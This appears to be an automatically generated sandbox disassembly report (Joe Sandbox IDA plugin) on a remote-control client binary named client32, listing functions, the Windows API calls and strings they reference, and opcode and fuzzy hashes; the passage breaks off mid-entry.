String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
API String ID: 3530579756-3361795001
Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91

Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,B24479DC,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1101B776
__CxxThrowException@8.LIBCMT ref: 1101B791
LoadLibraryA.KERNEL32(NSSecurity.dll), ref: 1101B7AE

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA

Strings

NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
NSSecurity.dll, xrefs: 1101B7A3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
API String ID: 3515807602-1044166025
Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91

Function 11005BB0 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 180COMMON

Download Yara Rule

APIs

ReleaseDC.USER32(00000000,?), ref: 11005C19
SetBkMode.GDI32(?,00000001), ref: 11005C5F
InvalidateRect.USER32(00000000,?,00000001), ref: 11005CDA

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDC.USER32(00000000), ref: 11005D08

Part of subcall function 110027F0: SetROP2.GDI32(?,00000007), ref: 11002807
Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 1100281A
Part of subcall function 110027F0: GetStockObject.GDI32(00000005), ref: 11002821
Part of subcall function 110027F0: SelectObject.GDI32(?,00000000), ref: 11002829
Part of subcall function 110027F0: Ellipse.GDI32(?,?,?,?,?), ref: 11002847
Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 1100285A
Part of subcall function 110027F0: SelectObject.GDI32(?,?), ref: 11002861
Part of subcall function 110027F0: SetROP2.GDI32(?,?), ref: 11002868

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11005C02, 11005CC1, 11005CF2
m_hWnd, xrefs: 11005C07, 11005CC6, 11005CF7

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$EllipseErrorExitInvalidateLastMessageModeProcessRectReleaseStockwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2286382378-2830328467
Opcode ID: 851854a736d5e0d675b7603e9c0956b36109ed08d14679f865bd8cfd7ab8b5d4
Instruction ID: e9a3d4a4942fbb4b58af945c8767c34c1742e1c8abd3ae03a76f14add5a4435e
Opcode Fuzzy Hash: 851854a736d5e0d675b7603e9c0956b36109ed08d14679f865bd8cfd7ab8b5d4
Instruction Fuzzy Hash: 286137B5A00B069FE764CF69C884BD7B7E5BF89354F10892EE5AE87240DB71B840CB51

Function 11047874 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 129registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 1104789A
wsprintfA.USER32 ref: 1104798C

Strings

\\.\%u\, xrefs: 11047986
"%s" %s, xrefs: 110479CE
%s (%d), xrefs: 11047A22
"%s", xrefs: 110479D7, 110479E4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewsprintf
String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
API String ID: 4060989581-4096285074
Opcode ID: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
Instruction ID: f393627671fb017ea66c5cc56c7c64c93c0c73457dc74dc6be4a09c67f558207
Opcode Fuzzy Hash: 50483885d5a567b398343bcef86fc2b71bb1aecd07356ab50f69eac27294fc47
Instruction Fuzzy Hash: F14106B5E006699BD725CB64CC80FEEB3B8EF45308F1045E8EA5997680EB31AE44CF55

Function 110478A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(?), ref: 110478CA
wsprintfA.USER32 ref: 1104798C

Strings

\\.\%u\, xrefs: 11047986
"%s" %s, xrefs: 110479CE
%s (%d), xrefs: 11047A22
"%s", xrefs: 110479D7, 110479E4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Closewsprintf
String ID: "%s"$"%s" %s$%s (%d)$\\.\%u\
API String ID: 4060989581-4096285074
Opcode ID: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
Instruction ID: 0c1333cb51f3e687940ac8a863b18b978c2e00f876245ba0d4622cc4c938ac8c
Opcode Fuzzy Hash: 94e375854bd533f4ade581e1d5e698a360fda3136e5abeb64bd52d03dd860e08
Instruction Fuzzy Hash: 1B4106B5E006699BD715CB64CC80FEEB3B8EF45308F1045E8EA5997280EB31AE44CF55

Function 110ED7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32 ref: 110ED801
_free.LIBCMT ref: 110ED81C

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_malloc.LIBCMT ref: 110ED82E
RegQueryValueExA.ADVAPI32 ref: 110ED85A
_free.LIBCMT ref: 110ED8E3

Strings

Error %d getting %s, xrefs: 110ED89D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_free$ErrorFreeHeapLast_malloc
String ID: Error %d getting %s
API String ID: 582965682-2709163689
Opcode ID: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
Opcode Fuzzy Hash: 4b19a493165c69821216a9cf770e163d849a3648b016c58b16d16473fa7c737d
Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1

Function 1100F990 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9

Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321

std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
_memmove.LIBCMT ref: 1100FA4D

Strings

string too long, xrefs: 1100F9C5, 1100F9E0
invalid string position, xrefs: 1100F9A4

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
Instruction ID: dd7b0a9210ae89047594a984bf0db1b74830ff0f253f3c884b4c9459fb9d7564
Opcode Fuzzy Hash: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
Instruction Fuzzy Hash: 1031FE72B04205CFE715CE5DE880A5AF7D9EF957A4B10062FE551CB240D771EC80D792

Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,756F110C,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
SetPriorityClass.KERNEL32(?,?), ref: 1103D167
IsWindow.USER32(?), ref: 1103D17E
SendMessageA.USER32(?,0000004A,0001033C,00000492), ref: 1103D1B8
_free.LIBCMT ref: 1103D1BF

Strings

Show16, xrefs: 1103D0E9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
String ID: Show16
API String ID: 625148989-2844191965
Opcode ID: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
Opcode Fuzzy Hash: 3c8172704bdceca68c72fbf0a9a51fac22612fd7412045f5de257e3282e9e7b5
Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81

Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572

WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0
IsA(), xrefs: 1100968D, 110096B5
<HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 863766397-389219706
Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1

Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON

Download Yara Rule

APIs

IsWindow.USER32(0000070B), ref: 110ED02A

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

LoadCursorA.USER32(00000000,00007F00), ref: 110ED0B1
SetCursor.USER32(00000000), ref: 110ED0B8

Strings

IsWindow(hRich), xrefs: 110ED03E
..\CTL32\NSWin32.cpp, xrefs: 110ED039, 110ED057
pEnLink!=0, xrefs: 110ED05C

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
API String ID: 2735369351-763374134
Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6

Function 110056A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(00000000,?), ref: 110056DD
BeginPaint.USER32(?,?), ref: 110056E8
BitBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,00CC0020), ref: 1100570A
EndPaint.USER32(?,?), ref: 1100572F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110056C3
m_hWnd, xrefs: 110056C8

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Paint$BeginClientErrorExitLastMessageProcessRectwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 1216912278-2830328467
Opcode ID: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
Instruction ID: 646bbc1308694ba02cb50681d3c8309cd3c635e6896d205317d73ea189e6e8a3
Opcode Fuzzy Hash: 8ad934cf7e7b29b38782cb4c4aa0535e86b672492a30f68ceedf0682d58b908e
Instruction Fuzzy Hash: FA1194B5A40219BFD714CBA0CD85FBEB3BCEB88709F104569F51796584DBB0A904C764

Function 110B94B0 Relevance: 10.6, APIs: 7, Instructions: 58COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 110B94C7
GetCursorPos.USER32(110C032C), ref: 110B94D6

Part of subcall function 1115F5B0: GetWindowRect.USER32(?,?), ref: 1115F5CC

PtInRect.USER32(110C032C,110C032C,110C032C), ref: 110B94F4
ClientToScreen.USER32(?,110C032C), ref: 110B9516
SetCursorPos.USER32(110C032C,110C032C), ref: 110B9524
